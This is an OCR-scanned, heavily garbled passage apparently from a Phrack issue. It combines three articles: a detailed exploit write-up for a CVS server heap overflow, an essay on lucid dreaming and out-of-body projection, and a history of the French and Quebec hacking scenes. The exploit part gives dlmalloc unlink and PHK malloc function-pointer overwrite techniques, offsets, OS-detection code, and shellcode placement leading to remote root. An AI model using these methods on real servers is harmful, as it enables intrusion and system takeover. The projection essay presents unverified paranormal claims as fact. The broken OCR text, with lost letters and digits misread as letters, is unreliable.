layout at the time of the overflow: 


[struct malloc_chunk] [an_entry] [struct malloc_chunk] [buf] [...] [top_chunk] 


By calling the function "Is_modified" with the name of the entry that we 
want to corrupt, we will overwrite the "an_entry" structure located after 
the current buffer. So, the idea is to overwrite the "size" field of 

a struct an_entry, so it become bigger than before and when free will 
compute the offset to the next chunk it will directly fall inside the 
controlled part of the ->entry field of this struct an_entry. So, we only 
need to add an "Entry" with a fake malloc chunk at the right offset. See 


define NUM_OFF7 (sizeof("Entry ")) #define MSIZE Ox4c 
define MALLOC_CHUNKSZ 8 #define AN_ENTRYSZ 8 #define MAGICSZ 
((MALLOC_CHUNKSZ * 2) + AN_ENTRYSZ) #define FAKECHUNK MSIZE — 


MAGICSZ + (NUM_OFF7 - 1) 


The offset is FAKECHUNK. 


Let’s sum up all the process at this point: 


1. The function fill_heap() fills all the holes in the heap by sending 
a lot of entry thanks to the Entry command.. 


2. We add 2 entries : the first one named "ABC", and another one with the 
name "dummy". The ->entry field of "ABC" entry will be overflowed and 
so the malloc_chunk of the struct an_entry "dummy" will be modified. 


3. We call the function "Is_modified" with "ABC" as a parameter, numerous 
times in a row until we hit the size field of the malloc_chunk. 
This has for effect to add ’M’ at the end of the buffer, outside 
its bound. Inside the ->entry field of the "dummy" entry we have 
a fake malloc_chunk at the FAKECHUNK offset. 
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4. If we now call the function "noop", it will have for effect to free() 
the linked list "entries". Starting from the end, the entry "dummy", 
and its associated "an_entry" structure, the entry "ABC" and its 
associated "an_entry" structure will be freed. Finally, all the 
"an_entry" structures that we used to fill the holes in the heap will 
also be freed. So, the magic occurs during the free of the an_entry of 
"dummy". 


= 


he exact malloc voodoo is like this 


e have overwritten with ’M’ characters the "size" field of the malloc 

hunk of the "an_entry" structure next to our "ABC" buffer. From there, 

free() the "an_entry" structure that had its "size" field corrupted, 

ree() will try to get to the next memory chunk at the address of the 

hunk + ’M’. It will bring us exactly inside a buffer that we have 

ontrol on, which is the buffer "dummy". Consequently, if we can insert 
fake chunk at the right offset, we are able to write 4 bytes anywhere 

n memory. 


rh 
= 


BYAAMEA S 


From this point, 90% of the job is already done! 


Notice: Practically, it is not enough to only create a fake next chunk. 
You need to make sure a second next chunk is also available. Indeed, 
DLmalloc is going to check the PREV_INUSE byte of the second next chunk 
to check if it the next chunk buffer is free or occupied. The problem is 
that we can not put ’\0’ characters inside the fake chunk, so we need 

to put a negative size field, to make sure that the next chunk of the 
next chunk is before the first chunk. Practically, it works and I have 
used this technique many times to code heap overflows. Check the macro 
SIZE_VALUE inside the exploit code for more information. Its value is -8. 


Now, we will dig a little bit deeper inside the exploit. Let’s take a 
look at the function detect_remote_os(). 


Here is the code: 


int detect_remote_os(void) { 

info("Guessing if remote is a cvs on a linux/x86...\t"); 

if (range_crashed(Oxbfffffd0, Oxbfffffdd + 4) || 
'range_crashed (0x42424242, 0x42424242 + 4)) 


{ 
printf (VERT"NO"NORM", assuming it’s *BSD\n"); isbsd = 
1; return (0); 

} printf (VERT"Yes"NORM" !\n"); return (1); 


With this technique, we will trigger an overwrite operation to an 

address that is always valid. This location will be a high address inside 
the stack, for example Oxbfffffd0. If the server answers properly, it 
means it did not crashed. If it did not crashed despite the overflow, 

it either means that the UNLINK call worked (i.e. It means we are under 
Linux with a stack mapped below 0xc0000000) or that the UNLINK call did 
not get triggered (= not Linux). 


To verify this, we will then try to write to an invalid, non mapped 
address, such as 0x42424242. If the server crashes, then we know for 
sure that the exploit does work correctly and that we are now on a Linux 
system. If it’s not the case, we switch to the FreeBSD exploitation. 


Right now, the only thing that we are able to do is to trigger a call 
to UNLINK in a reliable way and to make sure that everything is working 
properly. We now need to get more serious about this, and get to the 
exploitation process. 


Generally, to successfully exploit such a vulnerability, we need to 
know the address of the shellcode and the address of a function pointer 
in memory to overwrite. By digging more into the problem, it is always 
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possible to make the exploit work with only one address instead of two. 
It may even be possible to make it work without providing any memory 
addresses! Here is the technique used to accomplish such a feat. 


Indeed, we are able to allocate an infinite number of buffers next to 
each others, to corrupt their chunk headers and to fr () them after 
with server_write_entries(). Being able to do this means that we can 
trigger more than one call to UNLINK, and this is what is going to make 
the difference. Being able to overwrite more than one memory address is 
a technique frequently used inside heap overflow exploits and usually 
makes the exploit targetless. In the following lines, I will explain 
how this behavior can lead us to the creation of the memcpy_remote () 
function, which takes the same arguments as the famous memcpy() function 
with the exception that it writes in the memory space of the exploited 
process. When we are able to trigger as many UNLINK calls as we want, 
we will see that it’s possible to turn the exploitation scenario in a 
"write anything anywhere" primitive. 


What are the benefits of being able to do this? 


If we can write what we want at the address that we want, without any 
size constraints, we can copy the shellcode in memory. We will write 
it at a really low address of the stack, and I will explain why later. 
To know what address to overwrite, we will overwrite the majority of 
the stack with addresses that point to the beginning of the shellcode. 
That way, we will overwrite the saved instruction pointer from a call 
to free() and we will obtain the control of %eip. 


All the art of this exploitation resides in the advance use of the UNLINK 
macro. We will go in the details, but before, let’s remember what is 

the purpose of the UNLINK macro. The UNLINK macro takes off an entry 

from the doubly linked list. Indeed, the pointer "prev" of the next 

chunk following the one we want to unlink is switched with the "prev" 
pointer of the chunk we are currently unlinking. Also, the pointer "next" 
of the preceding chunk before the one we want to unlink is switched with 
the "next" pointer of the chunk we are currently unlinking. 


Remember the fact that only free malloc chunks are in the doubly linked 
lists, which are then grouped by inside binlists. 


The "prev" field is named BK and it is located at offset 12 of a malloc 
chunk. The "next" field is named FD and is at offset 8 of malloc chunk. 


We can then obtain the following macros: 


#define CHUNK_FD 8 #define CHUNK_BK 12 #define SET_BK(x) 
(x — CHUNK_FD) #define SET_FD (x) (x -— CHUNK_BK) 


If we want to write 0x41424344 at 0x42424242, we need to call the UNLINK 
macro the following way: 


UNLINK (SET_FD (0x41424344), SET_BK(0x42424242)). 


The thing is that we want to write "ABCD" at 0x42424242, but UNLINK will 
write both at 0x42424242 and at 0x41424344. "ABCD" is not a valid address. 


he solution to mitigate this problem is to write a character at a time. 
We will thus write "A", then "B", then "C" and after this "D" until 

there is nothing left to write. To achieve this, we need a range of OxFF 
characters that we are willing to trash. It is easy to obtain. Indeed, 
i 
fe) 
t 


f we take a really high address in the stack, we would find ourselves 
verwriting environment variables that were first stocked at the top of 
he stack. 


At the time, we were writing this exploit for stacks that were mapped 
below the Kernel space / User space, which was 0xc0000000. The exact 
address that I chose was O0xc0000000 —- OxFF. 
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Basically, if we want to write "ABCD" at Oxbfffd000, we will need to 
execute the following calls to UNLINK: 


UNLINK (UNSET_FD(Oxbfffd000), UNSET_BK(Oxbfffff41)) (0x41 being 
the hexadecimal equivalent of ’A’). 


UNLINK (UNSET_FD(Oxbfffd001), UNSET_BK(Oxbfffff42)) (0x42 being 
the hexadecimal equivalent of ’B’). 


And so on 


So, if we are able to execute as many UNLINK as we want, and if we have 
a range of address of OxFF that can be modified without consequences on 
program execution, then we are able to make ’/memcpy’ calls remotely. 


To sum up: 
1. We normalize the heap to put it in a predictable state. 


2. We overwrite the size field of a previously allocated chunk of an 
"an_entry" struct. When this an_entry entry will be free(), the 
memory allocator will think that the next chunk is located inside data 
under our control. This next fake chunk will then be marked as free, 
and the two memory blocks will be consolidated as one. Malloc will 
then take the next chunk off its doubly linked list of free chunks, 


and it will thus trigger an UNLINK, with a FD and BK under our control. 


3. Since we can allocate as many "an_entry" entries as we want and free 
them all at the same time thanks to server_write_entries(), we can 
trigger as many UNLINK as we want. This leads us, as we just saw, 
to the creation of the memcpy_remote() function, that will let us 
write what we want and where we want. 


4. We use the function memcpy_remote() to write the shellcode at a really 
low address of the stack. 


5. We then overwrit ach address in the stack, starting from the top, 
until we hit a saved instruction pointer. 


6. When the internal function that frees the chunk will return, our 
shellcode will then b xecuted. 


Here it is ! 


Notice: We have chosen a really low address in the stack, because even 
if we hit an address that is not currently mapped, this will trigger a 
pagefault(), and instead of aborting the program with a signal 11, it 
will stretch the stack with the expand_stack() function from the kernel. 
This method is OS generic. Thanks bbp. 


--[ 4 - A couple of words on the BSD exploitation 


As promised, here is the explanation of the technique used to exploit the 
FreeBSD version. Consider the fact that with only minor changes, this 
exploit was working on other operating systems. In fact, by switching 

the shellcode and modifying the hardcoded high addresses of the heap, 

the exploit was fully functional on every system using PHK malloc. 

This exploit was not restricted only to FreeBSD, a thing that the script 
kiddies didn’t know. 


I like to see that kind of tricks inside exploits. It makes them powerful 
for the expert, and almost useless to the kiddie. 


The technique explained here is an excellent way to take control of the 
target process, and it could have been easily used in the Linux version 
of the exploit. The main advantage is that this method does not use the 
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magic of voodoo, so it can help you bypass the security checks done by 
the malloc code. 


First, the heap needs to be filled to put it in a predictable state, lik 
for all the heap overflow exploits. Secondly, what we want to do basically 
is to put a structure containing function pointers right behind the buffer 
that we can overflow, in order to rewrite functions pointers. In this 
case, we overwrote the functions pointers entirely and not partially. 


Once this is done, the only thing that remains to do is to repeatedly send 
big buffers containing the shellcode to make sure it will be available 
at a high address in the heap. 


After, we need to overwrite the function pointer and to trigger the use 
of this same function. As a result, the shellcode will then be run. 


Practically, we used the CVS command "Gzip-stream" that allocated an 
array of function pointers, inside a subroutine of the serve_gzip_stream() 
function. 


Let’s recap: 
1. We fill_holes() the PHK’s malloc allocator so that the buffer that 


we are 
going to overwrite is before a hole in the heap. 


2. We allocate the buffer containing 4 pointers to shellcode at the right 
place. 


3. We call the function "Gzip-stream" that will allocate an array of 
function pointers right inside our memory hole. This array will be 
located right after the buffer that we are going to overflow. 


4. We trigger the overflow and we overwrite a function pointer with the 
address of our shellcode (the macro HEAPBASE in the exploit). 
See OFFSET variable to know how many bytes we need to overflow. 


5. With the "Entry" command, we add numerous entries that contain NOPs and 
shellcode to fill the higher addresses of the heap with our shellcode. 


6. We call zflush(1) function which end the gziped-stream and trigger an 
overwrited function pointer (the zfr one of the struct z_stream). 
And so on, we retrieve a shell. If we are not yet root, we look if 
one cvs’s passwd file is writable on the whole cvs tree, which was 
the case at the time on most of servers, we modify it to obtain a 


root account. We re-exploit the cvs server with this account and -— 
yes it is - we have rO0t on the remote. :-) 
--[ 5 - Conclusion 


We thought that it was worth presenting the exploit the way it was done 
here, to let the reader learn by himself the details of the exploitation 
code, which is from now on available in the public domain, even though 
the authors did not want it. 


From now on, this section will be included in the upcoming releases of 

phrack. Each issue, we will present the details of an interesting exploit. 
The exploit will be chosen because its development was interesting and the 
t 
e 
t 


he author(s) had a strong determination to succeed in building it. Such 
xploits can be counted on the fingers of your hands (I am talking about 
he leaked ones). With the hope that you had fun reading this 


--[ 6 - Greeting 


To MaXX for his great papers on DL malloc. 
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Hacking your brain: 
The projection of consciousness 


by keptune 


Dead Underground, for this new Phrack issue, The Circle of Lost 
Hackers has decided to start one more new section entitled "Hacking 
you brain". We already hear you: "what the hell this subject is in 
relation with computer hacking???". Well, as we already mentioned in 
other articles, for us hacking is not only computer hacking but 

it’s much more. 


The following article, as you will understand, talks about out of body 
experiences. By publishing this article in a magazine like phrack, we 

know that it will bring scepticism. The author, in this article, claims 
that such out of body experiences are possible. One of the main rule 
fe) 
a 
a 


f the underground is to not be blind and trust everything simply because 
n authority claims it, to try everthing by yourself with criticism 

nda totally open mind spirit. It’s why, for us, the unreasoning 
credulity is something more blameworthy than a presumptuous and septic 
guy who reject facts without examinating if they are real. 


Even if an out of body experience is interesting, what is more interesting 
is the new implication that it leads up. It’s unrecognized by the current 
Science even if it’s known for ages. If the following information are 

true —- what we affirm - then it’s revolutionary. Be able to live out of 
your body means that the dead is no the end but only one step that we all 
have to pass over. 


All these reasons make us think that publishing an article like that in 
Phrack is a good idea. Because before being a computer hacking magazine, 
phrack is dedicated to spread the occult knowledge, unrecognized and 
subversive. 


We let you discover and experiment by yourselves this fantastic 
phenomenon that are lucid dreams and out of body projections so that 
you can make up your own opinion. 


Have a good read. 


The projection of consciousness 
by keptune 


Since the Ancient times, as far as we know, humankind has been animated by 
the most impressive curiosity for almost everything, especially for this 
strange thing that is the Mind : something concrete although impalpable to 
the subject, yet invisible to the world. Some of the oldest carvings and 
paintings that have been discovered in Africa are full of dream visions 
and abstract symbols, most likely depicting chamanic inner travels. 
However, it appears that the .power. to investigate how the mind works and 
to retrieve pieces of information on the consciousness and its mecanisms 
has been monopolized early in History by a few ones. Call them chamans, 
sorcerers, wisemen, etc., they have gained a social position through the 
ages by grabing the exclusive rights of these investigations. Which might 
has been wise at first, as the initiations to these practices were mostly 
done from master to disciple in order to keep the teaching intact. But 
indirectly, it has led the majority to be ignorant of these subjects, 
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almost fearful about the workings of the consciousness and what could 
modify it. When the time came for the brand new .modern science. to 
study the Mind, during the XIXth century, some would have thought that 
everything was about to change. But in place it was only the continuity 
of the past traditions, although by fathering new ones: psychologists, 
psychiatrists, neurologists. Nowadays, if you do not have at least a 
master degree in one of these subject, you are simply considered ignorant 
by the scientists about the mind. That.s right, your . own . mind, your 
consciousness. You are just not .authorized. to talk about it, or mocked 
at if you try, like a child who would try to build a skyrocket . cute, 
but impossible. It is no more than another form of monopoly, to control 
the main dogma of materialism in our society. It is like saying that 

you are not intelligent enough to think about it, so just do not try, 
serious people are doing it for you and will tell you what to think and 
how to apprehend your own life. Meanwhile, just work, consume and enjoy. 


But guess what: these people, most likely unconsciously as they are being 
-manipulate. too by the main dogma, just want to make you think that 

you canno.t know anything about the mind, your . own . consciousness, 
without them. And you would be a fool to try in spite of this all-powerful 
fact. Which is just wrong. Seriously. In fact, you are the one who 

is all-powerful about his own consciousness. But you must use it, and 
bring it to unknown territories in order to understand it by yourself, 
which is the only way. Some might be thinking at this point: my mind 

is what it is, what is he talking about? Sometimes I am sad, or joyful, 
but my mind stays the same beneath that. Well, wrong. You just did 
not try to change it, to push it to it.s extreme. I am talking about 
something with the same subjective difference than the physical reality 
and a dream. Think Matrix, less the glasses, the robots and the giant 
killing computer. I am talking about a skill that anyone can develop: 
projection of consciousness, one of the most amazing faculty of the mind. 


What is projection of consciousness? Have you ever lucid dream? I mean, 
dreaming and knowing that you are dreaming? Realizing that the world 
around you is just an illusion created by your mind and you did not 
notice it at first? That is a type of projection of consciousness, the 
lowest one in fact. You are projecting your mind out of the feeling 

of your physical body, into another reality. Dreaming is a type of 
projection of consciousness, although non-lucid one are the lowests from 
the lowest, not very interesting for the real mind raiders. But it.s 

a good bridge to do some more serious projection activities. At this 
point of the article, I know that some are already thinking: whatever, 
dreams are not real. WRONG. That is a typical shortcut from the dominant 
materialistic, so-called .scientific., dogma, which considers that all 
that is not palpable is not real. Then your mind as a unity of perception 
and consciousness is not real, because guess what, even the best EEG 
canno.t find where the mind sets in the brain (if it is in the brain at 
all). All they do is record electrical signals here and there. For your 
mind, the dream is as solid and real as physical reality. That is why 
you wake up sweating from a nightmare, with you heartbeat at 200, and 
still all frightened during a few minutes. Or at the opposite, you wake 
up with a feeling of completeness after a really amazing and beautiful 
dream. Right? A dream is impalpable, but it is real nonetheless for the 
observer, you. And now think about this: about one sixth of your life is 
made of dreams. Almost an entire seperate life, which most people just 
disregard as unreal (=impalpable) and therefore uninteresting. That is 
just sad, when you know all the amazing possibilities of the mind, which 
can . and will . really transform your life by bringing your attention 
to a whole new dimension. Something noboby has ever talked to you about 
I guess. Something that is still mostly undiscovered, where you are a 
real pionnier. 


If you have never even lucid dream, you are situated right now at the 
first floor of a skyscrapper, ignoring that there is an elevator just 
behind you that could bring you in no time to a flabbergasting landscape 
and a whole new perspective. Seriously. You canno.t know what your 

mind, your consciousness, is made of unless you accept to explore it by 
yourself. The modern scientific method tends to analyze from an outside 
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point of view, which just canno.t led to a full understanding. It would 
be like trying to understand how you watch works without opening it up 
at one time or another. 


I guess many are thinking right now about shrooms, pot and crack, salvia 
divinorum, entheogens, hallucinations etc. That.s on the exact opposite of 
what I am about to explain. You do not need anything more than yourself 
(and hopefully your mind too) to project in full consciousness. Plants 
have been used a lot by chamans to attain different levels of perception, 
but nowadays it is very unlikely that you know a chaman that could 

guide you into a safe practice using them. Taking some is therefore 

not recommended for projection of consciousness, as you need to be 

fully aware. Moreover, some might just think afterwards that it was 
hallucinations due to the drugs, which would ruin the whole point of 

the experience. 


So let us start. From my own experience (it is always important to speak 
by experience on this subject and not from books or theories, even mor 
as the point is to gain a first-hand knowledge of all this), there are 
different levels of projection (the fact of putting your consciousness 
out of the perception of the physical universe, into another form of 
reality). From the lowest to the highest: 


—- dreams 

— lucide dreams 

— wake initiated lucid dreams 
— full physical projection 

—- higher projections 


Everyone knows dreams. Well in fact some people never remember their 
dreams, but everyone can after only a few days of training (thinking 
hard about the last image in mind just after waking up for example is a 
good way to progressively remember full dreams). I won.t talk about it 
here as everyone can achieve this state quite easily. 


Lucid dream is a type of dream that not everyone has experienced, or 

for some only a few times. It is dreaming and realizing that something 
is wrong, and eventually that you are in a dream. It opens up a whole 
new perspective to dreaming: have you ever thought of controlling the 
whole universe? Well, with some training, you can in lucid dreams. It 

is also a place to meet solidified parts of your psyche, your 
subconscious. Characters become interfaces with deeper parts of your 
mind. You can retrieve old of lost information or interact with your 

own mind by creating psychic anchors through them. You are like inside 
of you own mind, I mean . really . inside, the universe around you is 

a symbolic materialized form of what you thought was so impalpable 

in the waking state. You can go on the lowest levels of your mind 
-programs. (i.e. your personality etc.) and modify them. Or you can just 
create your own worlds, and enjoy the landscapes, the .people. you meet 
(parts of you in fact, with sometimes what seems to be a real kind of 
independent behaviour and own proto-mind). Something I am experimenting 
with lately is fusioning with the strongest .people. (part of my psyche) 
that I encounter. I just ask to fusion and our bodies melt into one. It 
is a really amazing experience each time, and I gain a lot of knowledge 
that I did not thought I had. It is like reunifying my mind little by 
little. Well, the possibilities are almost limitless, so just think about 
anything you would like to do, and you can! It is also a good place to 
face blocages and fight them. The result in the physical life is real 

if you win. Some have destroyed their OCD in this state, others have 
gained enough willpower to stop drugs or take control of their lives etc. 


Becoming lucid for the first time can be however some kind of a 
challenge. Fortunately, many types of training have been developped. Her 
are a few ones. I encourage you to google these for more information 

and technics: 


—- Make your watch beep every x minutes. It can be quite annoying for other 
people though. However, this beep will progressively be integrated by your 
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subconscious mind and will start to appear in your dreams after a week or 
two. What you must do (in physical reality) is check out your surrounding 
everytime your watch beeps. Do this seriously, it is really important to 
get totally involved into this verification of reality. Try to remember 
your whole day, and the past days, for chronological problems etc. Do 

not think that you are in the physical reality but really imagine that 
you might be dreaming. If you realize that there is a problem, well, 
congratulations, you are doing a lucid dream now. 


- Do some reality checks the same way when you see something strange, or 
on the opposite (which might work better for some) when you do something 
really basic, like washing your hands, or opening a door. Do it each time 
for a few days or weeks, and very seriously (at least for one minute). You 
will become lucid if you try this while dreaming after it becomes a habit 
(as it will be integrated by the subconscious mind). 


- Before you go to sleep, while laying down in your bed, feel the world 
around you, feel that you are lucid, fully aware of yourself. Repeat a few 
times .I WILL be lucid tonight, I WILL be lucide tonight .. while holding 
the feeling of lucidity. Do this until you start sleeping if you want. 


Once you become lucid in a dream, stay calm and enjoy. Repeat loudly 
every five seconds (to prevent you from risking to lose your lucidity and 
being caught back into a normal dream) that you are lucid, it will help 
you stay in this state. You can try to fly to move more easily into your 
created universe (lift your legs and even move your arms as if you were 
swimming might help at first), but do not try harder stuff like going 
through walls, teleporting or creating big objects from nothing before 
you have enough experience to stabilize entirely your dream. Indeed the 
mind does not like lucid dreaming at first and it will try to wake you up 
(in this case, if you feel that the dream is losing consistency and the 
image is disapearing, concentrate very hard on your five senses, touch 
the ground, look closely to some details etc. This will help to get you 
back into the dream but you might lose a lot of mental energy doing so so 
repeat actively that you are lucid after that otherwise you might lose 
your lucidity entirely), or to make you lose your lucidity (typically, 

by catching you back into a scenario . a naked member of the opposite 

sex (or same, depending of the sexual preferences) might appear, someone 
will tell you that something has happened to your house, a giant dinosaur 
might start chasing you etc., anything that would get you involved into 
the dream will be used, so do not get caught and stay focused! 


If you have imagination and willpower (which I am sure is the case), 
you will see changes in your everyday life and personality in a matter 
of weeks of practice. Your centers of interest might change, as well 

as what you feel is important in life, so stay aware of your needs and 
aspirations. However, this kind of dream initiated lucid dream is still 
not as powerful as a .full. lucid dream. 


What I mean by full lucid dream is a dream initiated from the waking 
state. Ok, some might think that dreams can only be initiated from 

this state, as we go to sleep etc. But do you ever remember th xact 
instant when you enter your dream? And moreover, being fully aware 

during the whole process? It is a really flabbergasting experience 
t 
W 
a 
3 
A 
( 


he first few times. It is like being suddenly propelled into another 
orld. If you thought dreams appeared slowly, that is far from reality, 
s the transition from your black mind vision to the full-colored and 
D dream takes no more than a second. You suddenly feel a new body, 
nto a whole new world surrounding you. The experience of a WILD 

Wake Initiated Lucid Dream) is extremely joyful and what one would 
call .real.. Appart from what is happening (you are flying etc.) the 
world seems as real and solid as the physical world would. But it is 
more of an Alice in Wonderland thing going on. Doing a WILD is a bit 
more tricky than a dream initiated lucid dream, but nothing impossible 
to do fortunately. One technic that is very effective is visualizing 
(=imagining and feeling) yourself walking into a known place (a mall, 
a street in your neibourghood etc.) I think that it is important to 
visualize some place you know (and not an imaginary one) as this will 
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a lot of what you see in this state. For example, this happened to me 

a few years ago : it was early in the morning and my girlfriend left 

the bedroom, to take a shower or eat her breakfast I thought. However I 
was very tired and soon get back in a very deep relaxed state. I pushed 
my consciousness frontwards and found myself hoavering above my body, 
fully aware. I floated through the room, then through the door, the hall, 
another door, and eventually was in the living room. I was surprised to 
see that my girlfriend was sleeping in a f.tus position on one of the 
sofas, in its left corner, her face against the back and my coat (which 

IT had left in the hall) as a blanket. I felt a powerful force sucking me 
back inside my body at this point. I immediately checked what I have seen: 
everything, down to the slightest detail, was correct. This kind of thing 
has happened to me a lot since then. You do not have to be religious, 

of even believe in life after death to make this experience, just try 

it before you make your own judgement, but give it a try at least. 


As you read in the experience I shared just above, I did not project 
physically from within a lucid dream. Indeed you can project from 
full conscious state too, which is even more powerful. If you want to 
learn more about these technichs, I suggest you buy some books about 
this subject, like the trilogy of Robert A. Monroe, a classic written 
during 30 years of experimenting by an electrical ingenieur which found 
h 

t 

( 

( 


imself projecting without even willing it. There are many good books out 
here. However projecting from a fully aware state is much more difficult 
but feasable of course), so be prepared to spend some time in training 
usually a conscious projection can be attained in a few days for the 
gifted to a few months for the ungifted, like I was). 


It seems that there are higher states of projection, apparently in some 
all-mental levels, but in an objective, all-mental, universe. I have 

yet to get into these, but hopefully some of you will get there ina 

few years. Let the community of projectors of consciousness know your 
discoveries at this time, as it is all about sharing. Indeed, projecting 
your consciousness is even more than a life-changing experience, it is 

a matter of protecting your freedom, your freedom to exist as a mind and 
a body, and to use both to their extreme limits, and even beyond. Noone 
can take that from you, even locked into the smallest and deepest prison 
of all. It is not even about believing, it is about trying by yourself 
to push your limits out of the ordinary, out of the known into mostly 

or fully unknown territories, and discover your true nature doing so. 


See you in other levels of consciousness. 


K. 
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| | 
| International scenes | 
| | 
| By Various | 
| | 
| | 


various@nsa.gov 


More or less 10 years after the last "International scenes" in 
phrack 48, the resurrection arrives. The purpose of this article 
is to present you hacking/cracking/phreaking scenes of different 
countries. This article is not writen by a single people but by 
people from all these differents counties. It’s why we ask you 
to send us descriptions of your scenes. It could be about groups, 
busts, technologies, great hackers or anything you think is 
interesting. 


There was once a time when hackers were basically isolated. It was 
almost unheard of to run into hackers from countries other than the 
United States. Then in the mid 1980’s thanks largely to the 
existence of chat systems accessible through X.25 networks like 
Altger, tchh and QSD, hackers world-wide began to run into each other. 
They began to talk, trade information, and learn from each other. 
Separate and diverse subcultures began to merge into one collective 
scene and has brought us the hacking subculture we know today. A 
subculture that knows no borders, one whose denizens share the common 
goal of liberating information from its corporate shackles. 


With the incredible proliferation of the Internet around the globe, this 
group is growing by leaps and bounds. With this in mind, we want to help 
further unite the communities in various countries by shedding light 

onto the hacking scenes that exist there. If you want to contribute a 
file about the hacking scene in your country, please send it to us 

at phrack@well.com. 


This month we have files about the scenes in France, Quebec and Bazil. 


A personal view of the french underground [1992-2007] 


by Nicholas Ankara 


The french scene has evolved a lot since years 1980’. Before 1993, there 
was no internet provider in France, which explain why the hacking scene 
in France has been mostly focused on phreaking and hardware-related 
hacking before this date. The first ISP (Worldnet) was founded by an 
influent hacker so-called NeurAlien. I am not sure that his identity 
was of public knowledge at this time, but I dont think Im taking too 
many risks by revealing this. 


NeurAlien was also the founder of what is known to be the first electronic 
french ezine about hacking, widely reknown as NoWay. NoWay started to be 
published in 1992 and did not deal so much with Internet Hacking, but 

more about the hacking on the MiniTel network. MiniTel is the ancestor 

of the Internet in France, and its use seems to have justified the late 

of using the Internet in this country. However, MiniTel was extremely 
slow and expensive, which incitated a wide amount of hacking to be 
developped around this. NeurAlien wrote at that time many philes about 
minitel hacking, most of them published in NoWay. He also participated 
in the writing of an International Scene article in Phrack #46 where he 
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explained the early hacking movement in France. 


NoWay inspired a lot of french hackers in the 90’ and many other ezine, 
such as NoRoute, were born after NoWay stopped publication, around 

1994. NoRoute was (afaik) the first french ezine dealing with Internet 
hacking as a main topic. Unlike NoWay, NoRoute was done by multiple 
authors, who confirmed to be highly-skilled hackers in the future, 

since some of them founded one of the most influent international hacking 
group in the 90’, known as ADM (Association De Malfaiteurs, that could be 
translated to ’Criminals Association’). That same group, under additional 
influences, gave a new life to the antisecurity movement in the early 
2000, by creating public web forums to justify the non-disclosure of 
exploit software. 


Affiliated to these peoples, another old school hacker named Larsen 
pioneered Radio Hacking in France. Larsen founded the CRCF (Chaos 

Radio Club of France), whoose research was compiled into an ezine 
called HVU. HVU gave lots of information about frequencies used by 
various services in France, including the police and other military 
groups of the country. Unfortunately, Larsen got busted later on, as 
he was getting out of his home in bicycle, by weaponed authorities who 
considered him as a terrorist, while he was just a happy hacker making 
no profit from his research. After this episode, it got more difficult 
for him to continue underground activities related to this topic, more 
precisely it was way more difficult to publish about it with the treat 
of a new so-called antiterrorist raid. This story reflects without any 
doubt the total incomprehension between hackers and national services of 
the country. It is more and more difficult to find contacts in publicly 
known meeting such as the 2600-fr which happens in Paris every month 
because of these reasons. 


Another major underground ezine that demarked itself by its technical 
quality was so called MJ13 (Majesticl13). It was mostly written by french 
hackers, also students in reknown french computer universities. MJ13 
contained material about virii, cracking, hardware hacking, and other 
related topics, but ceased publication after only 4 issues. There 

were also attempt to group hackers for legal reasons (as in creating 

a syndicate of hackers somehow) by the Hacker Emergency Response Team 
(HERT) founded by Gaius. Gaius (ACZ) was a french hacker of the early 
90’ reknown for his social engineering hacks into FBI and CIA telephone 
network. Surprisingly, he never got jailed but at some point he had to 
move from the country, officially to escape authorities. HERT was never 
a hacking group but included a lot of hackers from other international 
groups such as ADM, w00w00, TESO, and others. 


As already stated, a major burden that always made the french hacking 
scene to suffer was the omnipresence of the french secret servic 

(DST: Direction de la Surveillance du Territoire) and their voluntee 

to infiltrate the french hacking scene by any mean. A good example of 

this was the fake hacking meeting created in the middle 1990’ so called 
the CCCF (Chaos Computer Club France) where a lot of hackers got busted 
under the active participation of a renegate hacker so called Jean-Bernard 
Condat. Since that time, the french hacking was deeply armed and a very 
suspectful ambiant spirit is regning for more than 10 years. Most of the 
old school hackers decided to stop contributing to the scene, which went 
ven more underground, to avoid infiltration of services. 


As the Internet was getting democratized in the late 90’, a new generation 
of hackers, ignorant of what happened with the CCCF, started to recreate 

a public face for the french hacking scene, and new phreaking and hacking 
groups started to create new influential ezines. The most reknown new 
school phreaking ezine was called Cryptel but had to cease publication 
because of major busting at the beginning of 2000’ . A lot of other ezines 
were born from unexperienced hackers but mots of them were ripped from 
existing material, or brang a very poor technical quality, which made 

them not worth mentioning any further. 


During the late 90’ / early 2000, other groups such as RTC created 
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an ezine which dealt mostly with network oriented hacking, but ceased 
publications after a few issues. Another group was created under th 

name Exile, which grouped french, canadians, and belgians young hackers. 
This group started as unexperienced but soon got quite a reputation 

by writing a lot of highly technical articles for various ezines such 

as the canadian quebecer magazine IGA, and later into Phrack. As the 
group evolved into another one under the name Devhell, their articles 
about new techniques of exploits, revers ngineering, never got into 

a dedicated ezine. There was once an attempt to create such an ezine 
but the difficulties of finding serious collaborators made it impossible. 


Last but not least, an international group of (partly french) 
highly-skilled hackers was created at the beginning of years 2000 also 
known as Synnergy Networks. This group got very known by publishing 
exploit software that were seemingly very hard to write (such as the first 
publications of heap overflow exploits) and writing references articles 
about the subject, some of them being published in Phrack Magazine. Just 
as other mentioned groups, it is very hard for a non-hacker to know 

if those groups are still in activity because of their closed-door 

nature by default and the absence of any up-to-date information on the 

web about them. It is safer for everyone serious about hacking to stay 
low-profile to avoid miscellanous troubles and keep the necessary freedom 
on performed activities. Nevertheless, it can be mentioned without fear 
that hacking is not closed to a given group, and the most active hackers 
in each group got in collaboration at some point to create a stronger 
manpower in order to face the merchandization of computer security and 

the increasing difficulty of succesfull computer networks intrusions. 


The french underground is also very active in the field of software 
cracking and many very skilled french crackers are still in activity. Just 
as their hackers alter-egos, french crackers learnt to stay very paranoid 
about their activities to avoid busting, and for this reason I will not 
mention any names of group or persons active on that topic. Actually I may 
be able to quote only one young group of revers ngineers who slightly 
overlap with the cracking community : the French Reverse Engineering Team 
(FRET). FRET holds a public forum on the topic of revers ngineering 

and none of their activities appear to be illegal. This forum stands 

for an educational place for the young generation of coders to learn 
low-level information about closed-source software. 


There were also a lot of other groups but I would not define them 

as hacking groups, as most of them were created by beginners or 
profit-oriented associations for other reasons than fun with hacking. 
Generally, those groups did not help to renew the hacking underground 
mindset and thus do not have a place ina file about the french 
underground history. The underground exists and remain very active. It is 
up to each hacker to enter the underground by providing material to other 
hackers. Hacking is not about disclosure of exploits or fame-seeking 

on public forums or mailing lists. It is about having fun by learning 
what you are not supposed to learn. Because of this, the underground 
will always exist, even if no trace of it remains on the WWW. 


The Quebec scen 


by g463 


Yesterday 


NPC (Northern Phun Co.) is believed to be the first hacking and phreaking 
group in the history of the Quebec scene. One of their member, known as 
Gurney Halleck, has already wrote on the 418 scene in the "International 
